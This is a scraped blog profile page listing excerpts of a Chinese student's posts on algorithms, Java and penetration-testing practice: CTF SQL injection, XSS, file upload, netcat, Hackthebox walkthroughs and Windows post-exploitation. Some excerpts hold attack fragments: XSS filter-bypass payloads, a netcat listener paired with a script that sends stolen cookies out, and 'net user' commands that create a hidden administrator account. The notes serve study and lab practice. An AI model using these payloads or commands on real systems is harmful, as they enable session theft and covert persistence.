自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(118)
  • 收藏
  • 关注

原创 研究生复试机试背诵自用

二刷 P3371 【模板】单源最短路径(弱化版) Dijkstra模板背诵。二刷 P1048 [NOIP2005 普及组] 采药 动态规划背包01问题。二刷 NUST 15-T7 训练map+set+vector容器的使用。二刷 P3366 【模板】最小生成树 Kruskal模板 背诵。二刷 P3366 【模板】最小生成树 Prim算法模板背诵。二刷 KMP算法 next版本背诵专用 匹配所有位置。二刷 P1443 马的遍历 BFS广搜 经典背诵。二刷 P1123 取数游戏 dfs深搜经典背诵。

2024-03-26 09:26:14 177

原创 Linux运维之knockd部署

在基于Debian/Ubuntu/Ubuntu的服务器上,可以使用apt-get命令来安装knockd。要想在指定的IP地址处打开端口22,请在计算机上使用下列命令。使用knockd,你尽可放心:你的SSH服务器是安全的,并且远离使用复杂扫描工具的攻击者。如果你有一台公众可访问的服务器,黑客可以轻松扫描其IP地址,查找服务器上的开放端口(尤其是用于SSH的端口22)。在你的服务器上,你可以使用nano或Vi。command:这是一旦客户软件的试探序列与序列字段中的模式,执行的命令。

2022-12-27 18:40:37 1010 1

原创 CTF例题合集(2)

由于判断可以得知 字符长度比较短的是stop hacking ,所以1405的是被过滤掉的内容。此时不难发现,admin右边的引号被转义成了普通的字符,所以admin左边的引号会和password右边的引号闭合。不难发现网页的回显结果非常单一,这可能是盲注注入类型 (布尔盲注)而#后面的内容都被注释掉了,所以此时的注入位置是123456。这里是fuzz字典,里面有很多可能被注释掉的敏感字段内容。接下来可以一步步的手工去进行盲注,不过非常的耗费时间。根据网页回显的特性不难发现,这符合布尔盲注的特点。...

2022-08-25 17:58:56 1142

原创 CTF例题合集(1)

判断出来闭合是单引号 接下来构造完整的闭合语句 发现回显正常 说明闭合差不多成功!可以使用and 1=1 和and 1=2进行控制性测试 这里不演示。1.用burp抓包登录进入,任意输入账号(除了admin)和密码即可,注意网页对admin账户最开始做了限制,所以admin是没办法登录进去的。(修改账号提交): nctf.nuptzj.cn/web13/index.php?状态码200表示请求成功 状态码401表示未授权访问 也就是登录失败。说明有3列在这个数据库中 接下来可以开始进行数据库的注入操作。.

2022-08-25 17:49:26 5849 3

原创 服务器入侵溯源和应急相关

Q:最直观最快速的服务器初步入侵溯源方式?---答: 通过日志应对网站入侵溯源的基本流程:1.首先可以利用工具或者手工对相应的日志进行分析,查找出可疑路径和可疑的IP地址等信息2.接下来考虑利用D盾或者河马等扫描工具对网站总目录的文件进行扫描,进而查看是否存在一些可疑的木马或者恶意程序文件等(如一句话木马)。3.根据流量特征和文件特征等信息,如tunnel.php等文件可以知道是反向代理这种。主要分析出黑客的攻击流程,从哪里进入的步骤。比如弱口令进入后台,通过什么漏洞获取webshell,然后后续如何操作的

2022-07-10 13:47:47 1773

原创 MSSQL数据库取证分析

核心内容: MSSQL数据库的备份类型:SQL Server的数据库固定一、拷贝MSSQL数据库文件固定 脱机仅仅是断开数据库的连接,如果数据库在使用的时候脱机,耗时可能比较久 分离只是从清单中移除,并不会删除数据库文件停止服务的两种方法:另一种数据库备份固定的方法: 第三种固定MSSQL数据库的方法是生成脚本固定 sql文件生成进行固定数据库相应生成的sql文件如何还原和打开呢? 第四种方式 两个数据库在网络互通的情况下 通过导出数据完成数据库迁移 需要两台主机的数据库服务可以相互连通 之后

2022-07-08 21:54:24 774

原创 算法分析之n皇后摆放问题(OJ-P1220)

源代码部分: 分析:皇后摆放问题可以采取递归的思路进行分析,具体如下PS:皇后是按行顺序依次放置的,所以不会出现一行放两个的情况,所以判断条件也就不需要判断是否是同一行这个条件了。 也可以采取回溯的方法 即非递归的形式求解皇后问题第2章采用递归技术求解,这里采用回溯法求解。实际上,2.3.2小节的递归算法对应的就是回溯法的递归框架,这里讨论采用非递归框架求解皇后问题。...

2022-06-13 10:08:52 796

原创 OJ算法分析题库(4)

源代码部分:代码部分:

2022-06-06 21:02:18 805

原创 算法分析之0/1背包问题---回溯法实现

【问题描述】有n个重量分别为{w1,w2,…,wn}的物品,它们的价值分别为{v1,v2,…,vn},给定一个容量为W的背包。 设计从这些物品中选取一部分物品放入该背包的方案,每个物品要么选中要么不选中,要求选中的物品不仅能够放到背包中,而且满足重量限制(装入背包中物品重量和恰好为W ),并能具有最大的价值。 【提示】该问题的解空间是一棵子集树! (1)对第i层上的某个分枝结点,对应的状态为dfs(i,tw,tv,op),其中tw表示装入背包中的物品总重量,tv表示背包中物品总价值,op记录一个解向量

2022-06-03 17:44:55 1599

原创 应急响应之日志分析专题

应急响应之日志分析专题

2022-06-01 15:01:02 555

原创 数据取证之服务器取证模块

服务器数字取证基础模块

2022-06-01 12:47:03 979 1

原创 nc瑞士军刀 (netcat) 和nc加密版ncat 更新中

nc传输的所有信息都是明文的nc一边要连接服务端,一般要连接控制端nc --help拓展:可以把nc进行改造 nc可以自解压成为一个小木马win下使用nc的方法:找到nc的目录,然后在当前目录下打开cmd,输入nc即可(一定要在cmd找到相应目录后 启动nc 直接点开nc没用)1.普通发送文字 保持通信服务端:监听4444端口(可以修改)(例如windows)nc -l -p 4444nc.exe -l -p 4444客户端:(例如Linux)nc -nv

2022-05-26 09:18:04 637

原创 OJ基础题库(5)

源代码部分:#include<stdio.h>int main(){ int t,m; while(~scanf("%d%d",&t,&m)){ int a,b,value[1001]={},i; while(m--){ scanf("%d%d",&a,&b); int j; for(j=t-a;j>-1;j--) if(value[j]+b>value[j+a]) value[j......

2022-05-19 15:16:48 3032

原创 算法动态规划之杂交水果取名问题

这个问题需要借鉴到动态规划中非常典型的:最大公共子序列问题的算法【问题描述】两种水果杂交出一种新水果,现在给新水果取名,要求这个名字中包含了以前两种水果名字的字母,并且这个名字要尽量短。也就是说以前的一种水果名字arr1是新水果名字arr的子序列,另一种水果名字arr2也是新水果名字arr的子序列。设计一个算法求arr。例如:输入以下3组水果名称:apple peach ananas banana pear peach 输出的新水果名称如下:appleach ban...

2022-05-19 14:59:45 1710

原创 JavaSE基础笔记 Java网络编程(2)

UDP相关类UDP是基于数据报的传输协议,java.net.DatagramSocket类负责接收和发送UDP数据报,java.net.DatagramPacket表示UDP数据报。(1)DatagramSocket类每个DatagramSocket与一个数据报套接字(内含本地主机的IP和端口)绑定,每个DatagramSocket可以把UDP数据报发往任意一个远程DatagramSocket,也可接收来自任何远程DatagramSocket的数据报。在UDP数据报中包含了目的地址信息,Data

2022-05-15 14:42:06 356

原创 JavaSE基础笔记 Java网络编程(1)

Socket编程相关类(1)Socket类 Socket类的对象表示一个套接字。客户端使用Socket类的构造方法创建套接字,创建的同时会自动向服务器方发起连接。 Socket类有如下一些构造方法。Socket(String host, int port) throws UnknownHostException, IOException:向服务器(域名host,端口号port)发起TCP连接,若成功,则创建Socket对象,否则抛出异常。Socket(InetAddress addres.

2022-05-15 12:47:19 351

原创 JavaSE基础笔记 Java常用类

Java常用类之Math类Java提供Math工具类(java.lang.Math)专用于数学运算,该类有很多静态方法,能完成指数运算、对数运算、平方根运算和三角运算等,还有两个静态常量:E(自然对数)和PI(圆周率)。Math类是final型,不能派生子类。另外,它的构造方法是private类型,因此该类也不能被实例化。Math类的方法较多,这里仅列出部分常用的,如表5.3所示。 方法 描述 abs() 返回绝...

2022-05-14 19:21:24 359

原创 JavaSE基础笔记 正则表达式

Java正则表达式常见应用:1.字符串匹配2.字符串分析3.文本替换4.Scanner定界符例题1:使用正则表达式匹配输入的字符串(例5.13)arg相应输入的内容如下abcabcabcdefabc "abc+" "(abc)+" "(abc){2,}运行结果:源代码备忘录:TestRegex.javapackage regex;import java.util.regex.*;public class TestRegex { public.

2022-05-14 14:24:40 271

原创 算法之动态规划 例题之矩阵连乘问题

动态规划自底向上分析图:这里需要注意:题目要求的仅仅是结合律 而没有要求交换律。所以判断是否可乘,并不需要单独去判断。在递归的过程中如果出现前面一个矩阵的j和下一个矩阵的i不相同,则说明不可乘。经过分析以后,我们通过自底向上的方式完成算法的设计即可。...

2022-05-04 21:55:43 1317

原创 Hackthebox靶场---Undetected 攻略实战(难)

正常思路 nmap进行端口扫描 发现开放了80和22端口网站进入80端口 是一个珠宝网站发现点击store会重定向到其他的urlhttp://store.djewelry.htb/我们首先用dirsearch扫描一下然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可echo 10.10.11.146 djewelry.htb store.dj...

2022-04-24 16:14:38 4180 2

原创 Kali下的小工具的使用笔记

不会使用可以用程序 --help查看如何使用域名信息搜集工具1.dnsenum 域名搜集工具 会连接到一些引擎 比如google等会猜测可能存在的域名 并查询相应的网段 对c段进行whois查询等dnsenum --enum [域名地址]2.fierce 对子域名扫描和搜集 很多是字典查询等fierce --domain [目标域名]3.snmpcheck 可以用于snmp服务的探测snmpcheck -t [目标ip地址]...

2022-04-24 10:41:19 1127

原创 OJ算法分析题库(3)

算法1:(贪心算法)#include<bits/stdc++.h>using namespace std;int main(){ int n;cin>>n;int a[n],b[n],ans=0; for(int i=0;i<n;i++) cin>>a[i]; for(int j=0;j<n;j++) cin>>b[j]; sort(a,a+n);sort(b,b+n); int lefta=0,leftb=0,right...

2022-04-23 20:29:49 1539

原创 HacktheBox靶场之Backdoor 核心提炼

自勉一句话:思维比工具更重要内网靶场Backdoor主要方向1:信息搜集(对目标的端口 服务 网站等进行扫描)nmap普通扫描 端口开放80和22nmap进行全端口扫描 多出来一个1337nmap -sS -sC -p- --min-rate=5000 10.10.11.125nmap漏洞模块的扫描:发现后台登录地址 以及用户admin这里学习到 一般wordpress的后台登录地址都是域名下的wp-login.phpnikto扫描工具没有发现什么...

2022-04-21 20:05:12 2115 1

原创 Nmap端口扫描器使用笔记 补充中

黑客更多像一个刺客。渗透测试厉害的人。百分之八十在做信息搜集 百分之10在做程序软件 剩下百分之10才会在攻击nmap全世界最厉害的扫描器活跃主机的识别工具会受防火墙等拦截 导致没办法扫描 zenmap就是nmap的图形界面版本一些功能:主机发现 需要知道内网有哪些主机是开机的 开放的端口扫描 需要知道端口针对的服务版本侦测 对应的服务的版本 可能会出现的漏洞操作系统指纹识别nmap //直接可以看到所有使用的命令nmap 192.1...

2022-04-21 17:32:36 2289

原创 技巧:XSS漏洞结合nc窃取Cookie实现免密码登录

XSS漏洞结合nc窃取Cookie实现免密码登录(已亲身通过burp抓包改Cookie在不同电脑实践成功!)如果某天不能用外网,也不能用kali存储型xss最重要的是获取用户的cookie!!!!!!!!!!document.cookie获取用户所在网站的cookie1.在黑客端用nc进行监听nc -lvp 4444 //使用nc监听4444端口2.XSS注入的恶意script脚本<script>var img = docum...

2022-04-18 09:48:04 1864

原创 Linux的数据备份和磁盘管理 与 haproxy负载均衡

数据备份windows中的一键恢复ghost软件 在linux的世界中也有一款名叫dd的软件是这种功能 可以实现整个磁盘的备份 前提是磁盘足够大一般需要进行备份的目录/root//home//var/spool/mail//etc//var/xxxx/mysql/除了标准系统重要文件以外你安装的某些服务,也需要备份备份的数据的存放容器:磁带机(针对大型系统)磁带机一般位置/dev/st0倒带mt -f /dev/st0 rewind擦除mt -f /

2022-04-18 09:44:41 146

原创 xss-labs靶场通关payload

地址: 欢迎来到XSS挑战流程:1.正常人 正常去输入即可2.标准测试代码输入 找相应的互动点有哪些 查看网页源代码3.寻找注入点 构造payload提交即可ssaq.com dsds' value=javascript:alert(1)Level1url:https://xssaq.com/yx/level1.php?name=test<h2 align=center>欢迎用户test</h2><center><..

2022-04-18 09:39:27 636

原创 OJ算法分析题库(2)

算法分析:算法大致的思路就是通过四个数组分别存储每次输入的数值内容。然后通过分组循环,四个数分两组,a和b一组进行一对多依次加法存到数组中,保证每个a组的数都和b组中的所有数进行过了加法运算。c和d也是一样的方式。两个数组ab和cd运算完毕以后,进行排序。排序完成以后接下来通过对ab数组的值进行依次循环,然后每次都会cd数组也进行循环判断,找到ab+cd=0的情况的个数。为了应对数值相同的情况,这里用到了upper_bound和lower_bound两个函数进行运算,具体原理读者可以自行分析....

2022-04-16 14:25:50 2506

原创 Apache-shiro漏洞利用合集

这里漏洞原理不再多进行赘述 主要是测试漏洞的利用过程漏洞1:shiro-550 CVE-2016-4437 shiro反序列化漏洞利用版本 Apache-shiro <1.2.4漏洞环境docker安装docker pull medicean/vulapps:s_shiro_1systemctl restart dockerdocker run -d -p 8081:8080 medicean/vulapps:s_shiro_1启动成功以后直接访问本地的8081端口即可

2022-04-15 17:17:54 2359

原创 Linux之shell编程

shell编程和windows中的powershell比较类似vi test.sh# ifconfigchmod +x test.shbash test.sh #此时可以帮我们去运行这个sh文件./test.sh #也可以用这种方法运行sh文件 相对路径 绝对路径都是可行的标准格式 放在每一个sh文件的最开始即可#!/bin/bash如果结束的时候写 exit 1 那么这个sh文件执行完之后 echo $? 就会输出1这里的数字最高到255 其他都输出0..

2022-04-15 08:41:07 212

原创 渗透测试之信息搜集专题

渗透测试全流程:1.信息搜集:1.获取域名whois信息(邮箱,电话,使用社工库查看泄露密码。尝试登录后台,邮箱-->搜索引擎查询--->社交账号,管理员生成密码的习惯,生成密码字典)2.查询服务器子站点,因为主站很难,可以查看是否有某个CMS或者其他漏洞3.看其ip地址,进行端口的扫描,进行漏洞探测,看是否有mysql,web服务器,ftp,ssh,3389...... 尝试弱口令,管理员设置的缺陷,敏感文件泄露4.查看服务器操作系统版本,nmap -o可以查,web中间.

2022-04-14 11:57:59 2057

原创 Windows影子用户及其相应的漏洞后渗透

#当获得一条shell后,可以创建一个影子用户,通过影子用户可以行驶正常用户的所有权限与功能,并且只可在注册表中被检测出来---(应急响应注册表很重要)1.首先需要拥有权限创建一个Administrator用户,并分配管理员权限。net user haha$ 123 /add #创建一个新用户haha 密码是123net localgroup administrators haha$ /add #将该新用户移动到管理员组下net localgroup users ...

2022-04-14 11:52:51 1789

原创 DVWA靶场补充payload

XSS部分dvwa靶场adminpassword但凡出现互动的地方,都可能出现漏洞!!!!!<pre>Hello <script>alert('1')</script></pre>script标签是js语言执行用的,当js正确执行的时候,不会出现东西,js会被浏览器执行!!!!<scr<script>ipt>alert('1')</script>点住我!<img src="x"..

2022-04-14 11:05:31 1060

原创 ★暴力破解漏洞(Burte Force)

暴力破解漏洞(Burte Force)借助足够的字典+Burp等工具repeat操作即可什么是暴力破解:连续性尝试+字典+自动化字典1.弱口令字典2.Github搜集3.只用指定字符生成(社工)4.社工库防范:1.要求用户设置复杂的密码2.每次认证使用安全的验证码3.对登录的行为做出判断和限制限制你的IP4.在必要的情况下使用双因素认证;技巧一:根据注册提示信息优化,在目标站点注册,搞清楚账号密码限制,比如大小写、密码长度限制。 技巧二

2022-04-14 10:47:53 1359

原创 ★CSRF XXE和SSRF漏洞

CSRF(跨站请求伪造)可以欺骗用户进行点击,一旦用户点击了,攻击完成CSRF和XSS区别:CSRF类似于钓鱼链接,是欺骗用户,借助用户权限攻击,但是没有拿到用户权限而XSS是直接获取cookie,拿到用户权限pikachu靶场例题:(借助burpsuite)GET型CSRF1.先在提示中随便登录一个用户2.进入修改个人信息 测试:修改手机为9999993.burp抓包 然后点submitGET /pikachu/vul/csrf/csrfget/c

2022-04-14 10:44:44 646

原创 ★文件包含漏洞

文件包含漏洞概念:把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数,这一调用文件的过程被称为包含。原理:文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。几乎所有的脚本语言都会提供文件包含功能,但是文件包含漏洞在PHP Web Application中居多,而在JSP,ASP,ASP.NET程序中却非常少,这是有些语言设计的弊端,在PHP中.

2022-04-13 18:32:12 554

原创 ★文件上传漏洞与Upload-labs靶场分析实战

网站常用后缀名phpphp3php5phtmlaspasacdxceraspxashxshtml小知识:防火墙常见函数<?php$a=" Wo jin tian lai LE! ";$b=trim($a); //trim() 首尾去空函数echo $b; //Wo jin tian lai LE!?><?php$b=deldot($a); // 删除文件名末...

2022-04-13 18:27:00 771

原创 算法分析:锦标赛问题 分治算法

【问题描述】设有n=24个运动员要进行网球循环赛。现要设计一个满足以下要求的比赛日程表:(1)每个选手必须与其他n-1个选手各赛一次;(2)每个选手一天只能参赛一次;(3)循环赛在n-1天内结束。请按此要求将比赛日程表设计成有n行和n-1列的一个表。在表中的第i行,第j列处填入第i个选手在第j天所遇到的选手。其中1≤i≤n,1≤j≤n-1。编写程序,输出k=4时的比赛日常表(矩阵)。[实验提示]我们可以按分治策略将所有的选手分为两半,则n个选手的比赛日程表可以通过n/2个选手的比赛.

2022-04-13 16:35:36 1458 1

原创 OJ基础题库(4)

#include<stdio.h>#include<iostream>#define N 1000using namespace std;int main(){ long long n,m,i,j; long long b[N]; while(cin>>n) { int k=0; cin>>m; b[1]=1;b[2]=2; for(i=1;i<=n;i++) { j=i; while(j%2=...

2022-04-12 09:35:37 1262

原创 算法分析之背包九讲(P1439)

算法采用动态分析的方式去分析:常规算法:#include<iostream>using namespace std;int main(){ int v,n; //v箱子容量 n物品数 while(cin>>v>>n){ int weight[n+1],value[n+1],i,r;weight[0]=value[0]=0; for(i=1;i<=n;i++) cin>>weight[i]>>va......

2022-04-12 09:14:33 363

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除